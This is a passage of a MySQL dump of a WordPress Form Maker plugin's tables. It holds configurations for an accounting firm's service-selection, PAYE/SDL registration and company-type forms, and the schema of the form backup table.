Management*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Messages & Appointments***Employee Management***Work & Tasks Management***Online Accounting***Device Management*:*w_choices_value*:**************:*w_choices_params*:**:*w_class*:**:*new_field*:*9*:*id*:*type_checkbox*:*type*:*Web Design*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Basic Page***Full Website***E-Commerce ***Email Marketing*:*w_choices*:*false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Basic Page***Full Website***E-Commerce ***Email Marketing*:*w_choices_value*:***********:*w_choices_params*:**:*w_class*:**:*new_field*:*10*:*id*:*type_arithmetic_captcha*:*type*:*Word Verification:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*1*:*w_count*:*+, -, *, /*:*w_operations*:**:*w_class*:*60*:*w_input_size*:**:*new_field*:*11*:*id*:*type_submit_reset*:*type*:*type_submit_reset_11*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*12*:*id*:*type_checkbox*:*type*:*Services*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Business***Tax***Cloud Accounting***Cloud Applications***Website Development***E-commerce***E-mail Marketing*:*w_choices*:*false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Business***Tax***Cloud Accounting***Cloud Applications***Website Development***E-commerce***E-mail Marketing*:*w_choices_value*:********************:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','1*:*show_hide*:*6*:*field_label*:*and*:*all_any*:*12***==***Business@@@*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*13*:*field_label*:*and*:*all_any*:*12***==***Tax@@@*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*8*:*field_label*:*and*:*all_any*:*12***==***Cloud Applications@@@*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*9*:*field_label*:*and*:*all_any*:*12***==***Website Development@@@*:*next_condition*:**:*new_condition*:*','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,27970,1,'Choose Your Options','','','fadeInLeft',0),(16,'PAYE Registration','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Phone:%</div><div wdid=\"16\" class=\"wdform_row ui-sortable-handle\">%16 - Cell Number%</div><div wdid=\"17\" class=\"wdform_row ui-sortable-handle\">%17 - Fax Number%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - Address:%</div><div wdid=\"14\" class=\"wdform_row ui-sortable-handle\">%14 - Postal Address%</div></div></div><div wdid=\"4\" type=\"type_section_break\" class=\"wdform_tr_section_break\">%4 - custom_4%</div><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Company Name%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Company Registration Number%</div><div wdid=\"22\" class=\"wdform_row ui-sortable-handle\">%22 - Would you like to register for PAYE only?%</div><div wdid=\"20\" class=\"wdform_row ui-sortable-handle\">%20 - PAYE Liability Date%</div><div wdid=\"23\" class=\"wdform_row ui-sortable-handle\">%23 - Would you like to register for both PAYE and SDL?%</div><div wdid=\"21\" class=\"wdform_row ui-sortable-handle\">%21 - SDL Liability Date%</div><div wdid=\"25\" class=\"wdform_row ui-sortable-handle\">%25 - Word Verification:%</div><div wdid=\"26\" class=\"wdform_row ui-sortable-handle\">%26 - type_submit_reset_26%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',27,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#16#**id**#Cell Number#**label**#type_text#****#17#**id**#Fax Number#**label**#type_text#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Postal Address#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#16#**id**#Cell Number#**label**#type_text#****#17#**id**#Fax Number#**label**#type_text#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Postal Address#**label**#type_text#****#5#**id**#Company Name#**label**#type_text#****#6#**id**#Company Registration Number#**label**#type_text#****#22#**id**#Would you like to register for PAYE only?#**label**#type_radio#****#20#**id**#PAYE Liability Date#**label**#type_text#****#23#**id**#Would you like to register for both PAYE and SDL?#**label**#type_radio#****#21#**id**#SDL Liability Date#**label**#type_text#****#25#**id**#Word Verification:#**label**#type_arithmetic_captcha#****#26#**id**#type_submit_reset_26#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*16*:*id*:*type_text*:*type*:*Cell Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*17*:*id*:*type_text*:*type*:*Fax Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*8*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*14*:*id*:*type_text*:*type*:*Postal Address*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_section_break*:*type*:*custom_4*:*w_field_label*:*<div class=\"wdform-section-break-div\" style=\"min-width: 300px; border-top:1px solid\"></div>*:*w_editor*:**:*new_field*:*5*:*id*:*type_text*:*type*:*Company Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_text*:*type*:*Company Registration Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*22*:*id*:*type_radio*:*type*:*Would you like to register for PAYE only?*:*w_field_label*:*300*:*w_field_label_size*:*top*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*20*:*id*:*type_text*:*type*:*PAYE Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*23*:*id*:*type_radio*:*type*:*Would you like to register for both PAYE and SDL?*:*w_field_label*:*400*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*21*:*id*:*type_text*:*type*:*SDL Liability Date*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*25*:*id*:*type_arithmetic_captcha*:*type*:*Word Verification:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yes*:*w_hide_label*:*2*:*w_count*:*+, -,*:*w_operations*:**:*w_class*:*60*:*w_input_size*:**:*new_field*:*26*:*id*:*type_submit_reset*:*type*:*type_submit_reset_26*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'PAYE Registration','','','none',0),(17,'Getting Started','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',3,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',1,1,'#**id**##**label**##****#','','0','none','false','true','','','',0,'testmode','','',0,'',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'','','','none',0),(18,'Getting Started','embedded','','<div class=\"wdform-page-and-images\" style=\"display: table; border-width: 0px; border-top-style: solid; border-top-color: black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\" style=\"\">%1 - Name:%</div><div wdid=\"14\" class=\"wdform_row ui-sortable-handle\" style=\"\">%14 - Company Name%</div><div wdid=\"16\" class=\"wdform_row ui-sortable-handle\" style=\"\">%16 - Contact Person%</div><div wdid=\"15\" class=\"wdform_row ui-sortable-handle\" style=\"\">%15 - Contact Number%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Address:%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\" style=\"\">%9 - Is the company owner managed?%</div><div wdid=\"12\" class=\"wdform_row ui-sortable-handle\" style=\"\">%12 - custom_12%</div><div wdid=\"11\" class=\"wdform_row ui-sortable-handle\" style=\"\">%11 - Is there more then one shareholder?%</div><div wdid=\"13\" class=\"wdform_row ui-sortable-handle\" style=\"\">%13 - custom_13%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',17,1,'1#**id**#Name:#**label**#type_name#****#14#**id**#Company Name#**label**#type_text#****#16#**id**#Contact Person#**label**#type_text#****#15#**id**#Contact Number#**label**#type_text#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#12#**id**#custom_12#**label**#type_editor#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****#13#**id**#custom_13#**label**#type_editor#****#2#**id**#Phone:#**label**#type_phone#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#14#**id**#Company Name#**label**#type_text#****#16#**id**#Contact Person#**label**#type_text#****#15#**id**#Contact Number#**label**#type_text#****#3#**id**#Street Address#**label**#type_address#****#4#**id**#Street Address Line 2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State / Province / Region#**label**#type_address#****#7#**id**#Postal / Zip Code#**label**#type_address#****#9#**id**#Is the company owner managed?#**label**#type_radio#****#12#**id**#custom_12#**label**#type_editor#****#11#**id**#Is there more then one shareholder?#**label**#type_radio#****#13#**id**#custom_13#**label**#type_editor#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*14*:*id*:*type_text*:*type*:*Company Name*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*16*:*id*:*type_text*:*type*:*Contact Person*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*15*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*250*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*200*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*300*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***yes***no*:*w_disabled_fields*:*yes*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*9*:*id*:*type_radio*:*type*:*Is the company owner managed?*:*w_field_label*:*200*:*w_field_label_size*:*top*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*12*:*id*:*type_editor*:*type*:*custom_12*:*w_field_label*:*<p>Are you and the other directors / shareholders involved in running the business</p><p><img class=\"wp-more-tag mce-wp-nextpage\" title=\"Next page\" src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" alt=\"\" data-wp-more=\"nextpage\" data-mce-resize=\"false\" data-mce-placeholder=\"1\"></p>*:*w_editor*:**:*new_field*:*11*:*id*:*type_radio*:*type*:*Is there more then one shareholder?*:*w_field_label*:*200*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*yes***no*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*yes***no*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*13*:*id*:*type_editor*:*type*:*custom_13*:*w_field_label*:*<p>Is there more then one shareholder where one shareholder owns 50% and the other shareholders owns the other 50%<br>The shareholding percentage (%) will depend on your circumstance.&nbsp;<br><img class=\"wp-more-tag mce-wp-nextpage\" title=\"Next page\" src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" alt=\"\" data-wp-more=\"nextpage\" data-mce-resize=\"false\" data-mce-placeholder=\"1\"><br></p>*:*w_editor*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Getting Started','','','none',0),(19,'Which company is right for me','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - The being business to registered is a:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - custom_2%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Does the company have more than 1 shareholders:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',4,1,'1#**id**#The being business to registered is a:#**label**#type_radio#****#2#**id**#custom_2#**label**#type_editor#****#3#**id**#Does the company have more than 1 shareholders:#**label**#type_radio#****##**id**##**label**##****#','1#**id**#The being business to registered is a:#**label**#type_radio#****#2#**id**#custom_2#**label**#type_editor#****#3#**id**#Does the company have more than 1 shareholders:#**label**#type_radio#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_radio*:*type*:*The being business to registered is a:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*For Profit company***Non-profit company***Professional company*:*w_choices*:*false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*For Profit company***Non-profit company***Professional company*:*w_choices_value*:********:*w_choices_params*:**:*w_class*:**:*new_field*:*2*:*id*:*type_editor*:*type*:*custom_2*:*w_field_label*:*<ul><li>For profit company - a company that generates a profit for it\'s owners<br></li><li>Non-Profit company - a company that is a NGO or organisation where the profits/surplus are not distributed to any individual or entity<br data-mce-bogus=\"1\"></li><li>Professional company - a company registered by Lawyers, Doctors or Accountants<br data-mce-bogus=\"1\"></li></ul>*:*w_editor*:**:*new_field*:*3*:*id*:*type_radio*:*type*:*Does the company have more than 1 shareholders:*:*w_field_label*:*250*:*w_field_label_size*:*left*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Yes***No*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Yes***No*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'','','','none',0);
/*!40000 ALTER TABLE `wpxb_formmaker` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_formmaker_backup`
--

DROP TABLE IF EXISTS `wpxb_formmaker_backup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_formmaker_backup` (
  `backup_id` int(11) NOT NULL AUTO_INCREMENT,
  `cur` int(1) NOT NULL,
  `id` int(11) NOT NULL,
  `title` varchar(127) NOT NULL,
  `type` varchar(100) NOT NULL,
  `mail` varchar(128) NOT NULL,
  `form_front` longtext NOT NULL,
  `theme` int(11) NOT NULL,
  `javascript` text NOT NULL,
  `submit_text` longtext NOT NULL,
  `url` varchar(200) NOT NULL,
  `submit_text_type` tinyint(4) NOT NULL,
  `script_mail` text NOT NULL,
  `script_mail_user` text NOT NULL,
  `counter` int(11) NOT NULL,
  `published` int(11) NOT NULL DEFAULT 1,
  `label_order` text NOT NULL,
  `label_order_current` text NOT NULL,
  `article_id` varchar(500) NOT NULL,
  `pagination` varchar(128) NOT NULL,
  `show_title` varchar(128) NOT NULL,
  `show_numbers` varchar(128) NOT NULL,
  `public_key` varchar(50) NOT NULL,
  `private_key` varchar(50) NOT NULL,
  `recaptcha_theme` varchar(20) NOT NULL,
  `paypal_mode` int(2) NOT NULL,
  `checkout_mode` varchar(20) NOT NULL,
  `paypal_email` varchar(50) NOT NULL,
  `payment_currency` varchar(20) NOT NULL,
  `tax` float NOT NULL,
  `form_fields` longtext NOT NULL,
  `savedb` tinyint(4) NOT NULL DEFAULT 1,
  `sendemail` tinyint(4) NOT NULL DEFAULT 1,
  `requiredmark` varchar(20) NOT NULL DEFAULT '*',
  `from_mail` varchar(128) NOT NULL,
  `from_name` varchar(128) NOT NULL,
  `reply_to` varchar(128) NOT NULL,
  `send_to` varchar(128) NOT NULL,
  `autogen_layout` tinyint(4) NOT NULL DEFAULT 1,
  `custom_front` longtext NOT NULL,
  `mail_from_user` varchar(128) NOT NULL,
  `mail_from_name_user` varchar(128) NOT NULL,
  `reply_to_user` varchar(128) NOT NULL,
  `condition` text NOT NULL,
  `mail_cc` varchar(128) NOT NULL,
  `mail_cc_user` varchar(128) NOT NULL,
  `mail_bcc` varchar(128) NOT NULL,
  `mail_bcc_user` varchar(128) NOT NULL,
  `mail_subject` varchar(128) NOT NULL,
  `mail_subject_user` varchar(128) NOT NULL,
  `mail_mode` tinyint(4) NOT NULL DEFAULT 1,
  `mail_mode_user` tinyint(4) NOT NULL DEFAULT 1,
  `mail_attachment` tinyint(4) NOT NULL DEFAULT 1,
  `mail_attachment_user` tinyint(4) NOT NULL DEFAULT 1,
  `user_id_wd` varchar(220) NOT NULL,
  `sortable` int(11) NOT NULL,
  `frontend_submit_fields` text NOT NULL,
  `frontend_submit_stat_fields` text NOT NULL,
  `mail_emptyfields` tinyint(4) NOT NULL DEFAULT 0,
  `mail_verify` tinyint(4) NOT NULL DEFAULT 0,
  `mail_verify_expiretime` float NOT NULL,
  `mail_verification_post_id` int(11) NOT NULL,
  `save_uploads` tinyint(4) NOT NULL DEFAULT 1,
  `header_title` varchar(255) NOT NULL,
  `header_description` text NOT NULL,
  `header_image_url` varchar(255) NOT NULL,
  `header_image_animation` varchar(200) NOT NULL,
  `header_hide_image` tinyint(4) NOT NULL DEFAULT 1,
  PRIMARY KEY (`backup_id`)
) ENGINE=MyISAM AUTO_INCREMENT=100 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_formmaker_backup`
--

LOCK TABLES `wpxb_formmaker_backup` WRITE;
